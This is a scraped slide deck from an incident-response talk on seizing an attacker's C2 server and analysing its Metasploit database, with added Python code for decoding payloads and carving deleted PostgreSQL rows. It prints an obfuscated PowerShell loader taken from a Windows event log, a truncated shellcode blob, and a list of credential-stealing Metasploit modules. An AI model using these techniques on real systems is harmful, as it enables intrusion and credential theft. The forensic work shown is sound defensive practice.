Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
Postman
 

Recently uploaded (20)

Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Project Management Semester Long Project - Acuity
Project Management Semester Long Project - AcuityProject Management Semester Long Project - Acuity
Project Management Semester Long Project - Acuity
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
 

Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

  • 1. © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL
      Honey, I Stole Your C2 Server: A Dive Into Attacker Infrastructure
  • 2. About Me
      • Senior Consultant – Mandiant, a FireEye Company
      • Focus on incident response
      • Email: andrew.rector@mandiant.com
      • Twitter: @andy_rektor
  • 3. Agenda
       Summary of an enterprise investigation
       Analysis of a Command and Control (C2) server
       PostGrok: A post-mortem Python project
  • 4. SUMMARY OF THE ATTACK
  • 5. A Typical Mandiant Investigation
       Client calls
       Deploy technology
       Find evil, solve crime
       Eradicate the attacker
       Post-remediation monitoring
       Sayonara
  • 6. This Investigation
       Standard beginning to any investigation…
        - Fortune 500 financial client contacts Mandiant
        - September 2016
        - Identified “strange” service installations…
  • 7. Investigation Details
      7045 | Information | A service was installed in the system.
      Service Name: NlCDHxYwMDHIOjtS
      Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String("SSByZWFsbHkgaG9wZSB5b3WSdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhleSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==")
  • 8. Investigation Details
      (the same 7045 service installation event as slide 7)
  • 9. Investigation Details
       Intelligence-led scoping
       Metasploit-based indicators
       Non-standard workstation names
       Service installations containing:
        • %comspec%
        • PowerShell
        • Base64 encoding
      4624 | Audit Success | An account was successfully logged on.
      <data>
      - Network Information:
        Workstation Name: QmMhuLYFzfNVblK2
        Source Network Address: 10.10.10.10
        Source Port: 3283
      Detailed Authentication Information:
        Logon Process: NtLmSsp
        Authentication Package: NTLM
        Transited Services: -
        Package Name (NTLM only): NTLM V2
        Key Length: 0
  • 10. Investigation Summary
       72 long hours later…
        - 129 systems identified
        - 116 compromised accounts
        - Initial attack vector identified
  • 11. ANALYSIS OF A C2 SERVER
  • 12. Two-sided Perspective
       The responder’s perspective
        - Incident response investigation
       The attacker’s perspective
        - Command and Control (C2) server
  • 13. Back to That Service Installation
      7045 | Information | A service was installed in the system.
      Service Name: NlCDHxYwMDHIOjtS
      Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String("SSByZ…==");IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();…
  • 14. Decoding Obfuscated Code
       Identify base64 encoded data
       Identify compression scheme
  • 15. Decoding Obfuscated Code
      (the same service installation as slide 13, with the base64 data and the DeflateStream/GzipStream compression layers highlighted)
  • 16. Decoding Obfuscated Code
       Decode base64 encoded layer 2
      function pwej6xjR {
          Param ($oID, $fP4L8tiY5H)
          $d9V = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
          <snipped>
          [Byte[]]$uGTfyXcU4 = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI…==")
  • 17. Decoding Obfuscated Code
       Disassemble shellcode
       Identify network calls
       Convert network byte order to ASCII
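Slides 13 through 17 describe peeling the service payload layer by layer: base64, then DeflateStream (and GzipStream) decompression, a second base64 layer that holds the shellcode, then the network call whose address must be converted from network byte order. The Python below is an added example, not code from the talk or from Metasploit: the sockaddr_in byte patterns it searches for (the x86 push/push and x64 mov r14 shapes of a reverse_tcp stager) are assumptions, and the payload it decodes is constructed inline around a documentation address.

```python
"""Peel a Metasploit-style PowerShell service payload (slides 13-17).

Added example, not code from the talk or from Metasploit.  Layers:
outer base64 -> DeflateStream (raw deflate) or GzipStream -> PowerShell
stage text -> inner FromBase64String("...") -> shellcode -> sockaddr_in
with the port and IPv4 address in network byte order.  The sockaddr_in
byte patterns are assumptions about the reverse_tcp stager layout, and
the sample payload is constructed below."""
import base64
import re
import struct
import zlib

INNER_B64 = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
# Assumed stager shapes for the sockaddr_in (AF_INET = 0x0002, then port, then IP):
#   x86: push <ip>; push <AF_INET|port>  -> 68 II II II II 68 02 00 PP PP
#   x64: mov r14, <sockaddr_in as imm64> -> 49 BE 02 00 PP PP II II II II
SOCKADDR_X86 = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.S)
SOCKADDR_X64 = re.compile(rb"\x49\xbe\x02\x00(.{2})(.{4})", re.S)


def inflate(data: bytes) -> bytes:
    """DeflateStream emits raw deflate (no zlib header); GzipStream emits gzip."""
    for wbits in (-15, 31, 15):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    raise ValueError("blob is neither raw deflate, gzip nor zlib")


def inner_blob(stage: str) -> bytes:
    """Decode the first FromBase64String("...") literal found in a stage."""
    m = INNER_B64.search(stage)
    if not m:
        raise ValueError("no FromBase64String(...) literal in stage")
    return base64.b64decode(m.group(1))


def extract_c2(shellcode: bytes) -> list:
    """Return [(ip, port, arch)] for every sockaddr_in pattern in the shellcode."""
    found = []
    for m in SOCKADDR_X86.finditer(shellcode):
        ip, port = m.group(1), m.group(2)
        found.append((".".join(str(b) for b in ip), struct.unpack(">H", port)[0], "x86"))
    for m in SOCKADDR_X64.finditer(shellcode):
        port, ip = m.group(1), m.group(2)
        found.append((".".join(str(b) for b in ip), struct.unpack(">H", port)[0], "x64"))
    return found


def decode_service_payload(outer_b64: str) -> list:
    """Outer base64 -> inflate -> stage text -> inner base64 -> shellcode -> C2 list."""
    stage = inflate(base64.b64decode(outer_b64)).decode("utf-8", "replace")
    return extract_c2(inner_blob(stage))


def build_sample_payload(ip: str = "192.0.2.10", port: int = 4444, arch: str = "x64") -> str:
    """Constructed sample: filler bytes around a sockaddr_in, wrapped the way the
    7045 service payload wraps its stage.  192.0.2.10 is a documentation address."""
    ip_bytes = bytes(int(o) for o in ip.split("."))
    port_bytes = struct.pack(">H", port)
    if arch == "x64":
        sockaddr = b"\x49\xbe\x02\x00" + port_bytes + ip_bytes
    else:
        sockaddr = b"\x68" + ip_bytes + b"\x68\x02\x00" + port_bytes
    shellcode = b"\xfc\x48\x83\xe4\xf0\xe8" + b"\x90" * 8 + sockaddr + b"\xc3"
    stage = ('function pwej6xjR { [Byte[]]$buf = [System.Convert]::FromBase64String("%s") }'
             % base64.b64encode(shellcode).decode())
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw deflate, as DeflateStream writes it
    raw = comp.compress(stage.encode()) + comp.flush()
    return base64.b64encode(raw).decode()


if __name__ == "__main__":
    for arch in ("x64", "x86"):
        print(arch, decode_service_payload(build_sample_payload(arch=arch)))
```

On a real 7045 event the outer blob is what follows the first FromBase64String in the Service File Name field; the recovered address is the indicator to hand to the client, as slide 18 does.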
  • 18. Provide Decoded IP to Client
       Provide decoded IP to client (C2 IP address)
  • 19. A Familiar IP
       Client recognizes IP owner
       Described as a “small time competitor”
  • 20. Client Asks For C2 Server
  • 21. Client Receives Entire Server
  • 22. Mandiant Images Server
  • 23. Forensic Analysis
       Windows Server 2008
        - Attacker created their own user account
        - Privilege escalation and credential harvesting
        - Best of all…
          • Downloaded VMWare Workstation
          • Downloaded Kali Linux ISO
          • Installed Kali VM – July 2016
          • Two months before attack starts
  • 24. Forensic Analysis
       Investigation inception
        - Focus on Kali
        - Export VM
        - Rinse, wash, repeat
  • 25. Forensic Analysis
       Kali VM
        - Valuable secure logs
        - Meterpreter configuration file
        - SQLMap – Detecting and exploiting SQL flaws
        - BeEF – The Browser Exploitation Framework
        - Revealing keyword searches
        - PostgreSQL history contained some interesting data:
      createuser msf -P -S -R -D
      createdb -O msf msf
      exit
      dropdb msf
      dropuser msf
      dropdb ms_test
      dropuser msf
      createuser msf -P -S -R -D
      createdb -O msf msf
      exit
      dropdb
      dropdb msf
      createdb msf
      exit
  • 26. Metasploit and PostgreSQL
       PostgreSQL command history tells a story
       PostgreSQL is messy
        - /var/lib/postgresql/<version>/main/base
        - Collection of binary files
        - Publicly available parser doesn’t exist
  • 27. Boot Up
       It’s a VM… what if we just boot up the VM and access the DB directly?
        - Password protected
        - Single User Mode
        - Change PW
        - Profit
  • 28. I AM THE ATTACKER
      Got System / Impersonate Attacker
  • 29. Metasploit… For IR?
       Leverage PostgreSQL history to obtain critical DB info
       Leverage MSFConsole to interact with PostgreSQL DB
      (the PostgreSQL history from slide 25 is shown again)
  • 30. Metasploit DB Commands
      Command  | Function
      Creds    | List all credentials in the database
      Hosts    | List all hosts in the database
      Loot     | Information gained from post-exploitation modules
      Notes    | Information from reconnaissance and network enumeration
      Services | Services running on identified hosts
      Vulns    | Vulnerabilities identified, and exploitation status
  • 31. PostgreSQL Shenanigans
       Good… but not great
        - Not everything had timestamps
        - Wanted even more detail
       Directly accessing the DB and bypassing Metasploit is the better way to go
        - DB via psql: psql -U msf -h localhost
        - And…
  • 32. SO MANY TABLES!
  • 33. Metasploit Credential Publics
  • 34. Metasploit Credential Realms
  • 35. Sessions
  • 36. Sessions Decoded
      ..{$".WORKSPACEI"..:.EF".VERBOSEI" true.;.F" USERNAME".Ultra<REDACTED>" PASSWORD".<REDACTED>".USER_FILEI"..;.F".PASS_FILEI"..;.F".USERPASS_FILEI"..;.F".BRUTEFORCE_SPEEDI".5.;.F".BLANK_PASSWORDSI" false.;.F".USER_AS_PASSI" false.;.F".DB_ALL_CREDSI" false.;.F".DB_ALL_USERSI" false.;.F".DB_ALL_PASSI" false.;.F".STOP_ON_SUCCESSI" false.;.F".REMOVE_USER_FILEI" false.;.F".REMOVE_PASS_FILEI" false.;.F".REMOVE_USERPASS_FILEI" false.;.F".MaxGuessesPerServiceI".0.;.F".MaxMinutesPerServiceI".0.;.F".MaxGuessesPerUserI".0.;.F".InitialAutoRunScript".".AutoRunScript".".RHOSTS".<company.domain.com>".THREADSI".50.;.F".ShowProgressI" true.;.F".ShowProgressPercentI".10.;.FI" RPORT.;.FI".22.;.FI".Proxies.;.FI"..;.F".SSH_DEBUGI" false.;.F".SSH_TIMEOUTI".30.;.F" RHOSTI".<Remote IP Address>.;.F
  • 37. Case Solved
       A complete timeline
       A perspective from two sides:
        - The investigator
        - The attacker!
       Happy client, happy consultant
  • 38. POSTGROK: A POST-MORTEM PYTHON PROJECT
  • 39. Identifying Additional Victims
       BUT WAIT…
        - Attacker had access to C2 server since July 2016
        - PostgreSQL history contained evidence of prior DBs
        - Is there any way to recover deleted DBs?
  • 40. Identifying Additional Victims
       At least three deleted PostgreSQL databases
        - Data verified via keyword searches
       Has anyone ever tried to recover PostgreSQL databases?
        - Research didn’t identify anything obvious
        - One project that was a work in progress, but not as much focus on PostgreSQL
      (the PostgreSQL history from slide 25 is shown again)
  • 41. Identifying Additional Victims
       Python hobbyist
        - PostgreSQL is open source
        - Went on a journey to read C
        - Created PostGrok to carve all PostgreSQL rows from a flat binary file (raw image)
  • 42. Down the PostgreSQL Rabbit Hole
  • 43. PostgreSQL Terms and Definitions
       Anatomy of a PostgreSQL DB
        - Tables
        - Page (page header)
        - Row pointers
        - Free space
        - Row entry
  • 44. A PostgreSQL Page (figure legend)
      Color  | Meaning
      Red    | Table Header
      Blue   | Row Pointers
      Yellow | Null Space
      Purple | Row Data
  • 45. PostgreSQL Page Header
       Table header
        - 24 byte structure
        - Version info
        - # of rows = (pd_lower – 24)/24
      (figure labels: Version, PD_Lower)
  • 46. PostgreSQL Row Pointers
       Row pointers
        - Four byte structures
        - Contains offset and size of row
  • 47. PostgreSQL Page Free Space
       Free space
        - New row pointers added from start of free space
        - New row data added to the end
  • 48. PostgreSQL Row
       Row entry
        - 24 byte header
        - Row data
      (figure label: Row Header)
  • 49. PostgreSQL Row Header
       Row header
        - Row insertion ID
        - Row deletion ID
        - Number of attributes
        - Offset of row data
      (figure labels: Deletion ID, Insertion ID, # of Attributes, Row data offset)
  • 50. Row Data
       Row data
        - Integers
        - Dates and times
        - Variable length strings
  • 51. PostGrok Capabilities
       PostGrok
        - A Python tool that thoroughly understands PostgreSQL
       Capabilities:
        - Carve PostgreSQL rows from a flat, binary file
        - Keyword searching
        - Exports to CSV or XLSX
        - Officially supports version 9.5
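Slides 43 through 51 describe the page anatomy that carving relies on: the 24-byte page header, the row pointers that fill from the front, the rows that fill from the back, and the row header carrying the insertion ID, deletion ID, attribute count and data offset. The Python below is an added example, not PostGrok's own code: it walks a flat image in 8 KiB steps, validates each candidate page header, follows the row pointers (dividing the pointer array by the 4-byte pointer size from slide 46) into each row header, and keeps rows whose deletion ID is set, which is what lets deleted data be recovered; the image it carves and the (int4, text) row layout it decodes are constructed inline.

```python
"""Carve rows from PostgreSQL 9.5 heap pages in a flat image (slides 43-51).

Added example, not PostGrok's own code.  Layout used: a 24-byte page header
whose pd_lower ends the array of 4-byte row pointers and whose pd_upper starts
the row data; each row starts with a 23-byte HeapTupleHeaderData (t_xmin =
insertion ID, t_xmax = deletion ID, low 11 bits of t_infomask2 = attribute
count, t_hoff = offset of the row data).  The sample image is constructed."""
import struct
from dataclasses import dataclass
from typing import List, Tuple

PAGE_SIZE = 8192
PAGE_HEADER_LEN = 24       # sizeof(PageHeaderData)
LINE_POINTER_LEN = 4       # sizeof(ItemIdData): lp_off:15, lp_flags:2, lp_len:15
TUPLE_HEADER_FMT = "<III6sHHB"  # t_xmin t_xmax t_cid t_ctid t_infomask2 t_infomask t_hoff
LP_NORMAL = 1              # lp_flags value for a pointer that references a row
LAYOUT_VERSION = 4         # low byte of pd_pagesize_version written by 9.5


@dataclass
class Row:
    offset: int   # absolute offset of the row inside the image
    xmin: int     # inserting transaction ID
    xmax: int     # deleting transaction ID, 0 while the row is live
    natts: int
    data: bytes

    @property
    def deleted(self) -> bool:
        # A DELETEd row keeps its bytes on the page, with t_xmax set, until VACUUM
        return self.xmax != 0


def page_header(page: bytes):
    """pd_lsn(8) pd_checksum pd_flags pd_lower pd_upper pd_special pd_pagesize_version pd_prune_xid."""
    _, _, _, lower, upper, special, size_ver, _ = struct.unpack_from("<QHHHHHHI", page, 0)
    return lower, upper, special, size_ver & 0xFF00, size_ver & 0x00FF


def looks_like_page(page: bytes) -> bool:
    """Sanity checks a carver applies before trusting 8 KiB of unknown bytes."""
    if len(page) != PAGE_SIZE:
        return False
    lower, upper, special, size, version = page_header(page)
    return (size == PAGE_SIZE and version == LAYOUT_VERSION
            and PAGE_HEADER_LEN <= lower <= upper <= special <= PAGE_SIZE)


def carve_page(page: bytes, base: int = 0) -> List[Row]:
    """Follow every row pointer between the header and pd_lower into its row."""
    lower, upper, *_ = page_header(page)
    rows = []
    for i in range((lower - PAGE_HEADER_LEN) // LINE_POINTER_LEN):
        (lp,) = struct.unpack_from("<I", page, PAGE_HEADER_LEN + i * LINE_POINTER_LEN)
        off, flags, length = lp & 0x7FFF, (lp >> 15) & 0x3, (lp >> 17) & 0x7FFF
        if flags != LP_NORMAL or off < upper or off + length > PAGE_SIZE or length < 23:
            continue   # unused, redirect or dead pointer: no row bytes to carve
        xmin, xmax, _, _, infomask2, _, hoff = struct.unpack_from(TUPLE_HEADER_FMT, page, off)
        rows.append(Row(base + off, xmin, xmax, infomask2 & 0x07FF, page[off + hoff:off + length]))
    return rows


def carve_image(image: bytes) -> List[Row]:
    """Walk a flat binary file in 8 KiB steps and carve every plausible page."""
    rows = []
    for base in range(0, len(image) - PAGE_SIZE + 1, PAGE_SIZE):
        page = image[base:base + PAGE_SIZE]
        if looks_like_page(page):
            rows.extend(carve_page(page, base))
    return rows


def decode_int4_text(data: bytes) -> Tuple[int, str]:
    """Constructed row layout (int4, text): the text has a 1-byte varlena header
    whose value is (total_length << 1) | 1, total_length counting the header."""
    (n,) = struct.unpack_from("<i", data, 0)
    total = data[4] >> 1
    return n, data[5:4 + total].decode()


def _row(xmin: int, xmax: int, n: int, s: str) -> bytes:
    text = s.encode()
    header = struct.pack(TUPLE_HEADER_FMT, xmin, xmax, 0, b"\0" * 6, 2, 0, 24) + b"\0"  # pad to t_hoff
    return header + struct.pack("<i", n) + bytes([((len(text) + 1) << 1) | 1]) + text


def build_sample_image() -> bytes:
    """Constructed: a junk page followed by one page holding a live row and a row
    that was DELETEd (xmax set) but not yet vacuumed."""
    page = bytearray(PAGE_SIZE)
    upper, pointers = PAGE_SIZE, []
    for t in (_row(1001, 0, 1, "alice"), _row(1002, 1007, 2, "bob")):
        upper -= (len(t) + 7) & ~7          # rows grow down from the page end, MAXALIGNed to 8
        page[upper:upper + len(t)] = t
        pointers.append(upper | (LP_NORMAL << 15) | (len(t) << 17))
    lower = PAGE_HEADER_LEN + LINE_POINTER_LEN * len(pointers)
    struct.pack_into("<QHHHHHHI", page, 0, 0, 0, 0, lower, upper, PAGE_SIZE, PAGE_SIZE | LAYOUT_VERSION, 0)
    struct.pack_into("<%dI" % len(pointers), page, PAGE_HEADER_LEN, *pointers)
    return b"\xff" * PAGE_SIZE + bytes(page)


if __name__ == "__main__":
    for r in carve_image(build_sample_image()):
        print(r.offset, "deleted" if r.deleted else "live", r.natts, decode_int4_text(r.data))
```

Decoding real attributes needs the table definition (the catalog fixes which columns are integers, timestamps or variable-length strings, as slide 50 lists), so on an unknown image the carved `data` bytes are what the keyword search runs over.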
  • 52. https://github.com/arector327/PostGrok
  • 53. PostGrok Findings
       PostGrok helped identify:
        - Full Meterpreter sessions from campaigns occurring in:
          • July 2016
          • August 2016
          • September 2016
        - 1,428 compromised credentials
        - 48 enumerated domains
  • 54. Top Post-Exploitation Modules
      Module | Frequency | Function
      run post/windows/gather/credentials/sso | 81 | Extract SSO credentials
      run post/windows/gather/enum_ad_computers | 26 | Enumerates systems in the default AD directory
      run post/windows/gather/enum_domains | 24 | Enumerates domains a host has visibility into
      run post/windows/gather/smart_hashdump | 14 | Dumps local accounts from SAM database
      run post/multi/gather/filezilla_client_cred | 11 | Collects credentials from FileZilla FTP client
      run post/windows/gather/credentials/gpp | 8 | Gathers GPP XML files and extracts passwords
      run post/windows/gather/credentials/credential_collector | 7 | Extracts credentials from host
      run post/windows/gather/credentials/outlook | 4 | Extracts and decrypts Outlook passwords from the Windows Registry
      run post/windows/gather/credentials/tortoisesvn | 4 | Extracts and decrypts saved TortoiseSVN passwords
  • 55. Attacker Creates User Accounts
      Attacker creates user account “mava2” on victim system
  • 56. Attacker Uploaded Webshells
      Attacker uploads “ntdaddy.php” and “cmd.php” to victim web server
  • 57. Attacker Data Theft
      Attacker downloads file “wifi_pass.xlsx” from victim workstation
      Attacker views contents of “FileZilla.txt” and downloads “23.7.2016.xls”
  • 58. Attacker Tradecraft
      Attacker executes PsExec, creates reverse shell using NetCat
  • 59. Attacker Tradecraft (cont.)
      Attacker attempts to unzip the archive “file.zip”, is unsuccessful, and downloads a DLL from another compromised web server
  • 60. Summary
       Mandiant investigated an intrusion conducted by an unknown attacker
       Obtained a C2 server, and performed forensic analysis
       Developed a tool to carve PostgreSQL rows from an image
  • 61. Takeaways
       Metasploit gets the job done
       Operational security
       Just ask
  • 62. QUESTIONS?

Editor's Notes

  1. Add ‘joke’ slide
  2. Easy slide to breeze past: the client contacts us with an alert, which we immediately recognize as a classic Metasploit PowerShell payload; this is pretty likely bad news.
  3. Easy slide to breeze past: the client contacts us with an alert, which we immediately recognize as a classic Metasploit PowerShell payload; this is pretty likely bad news.
  4. REDACT BETTER
  5. Warning that things are about to get technical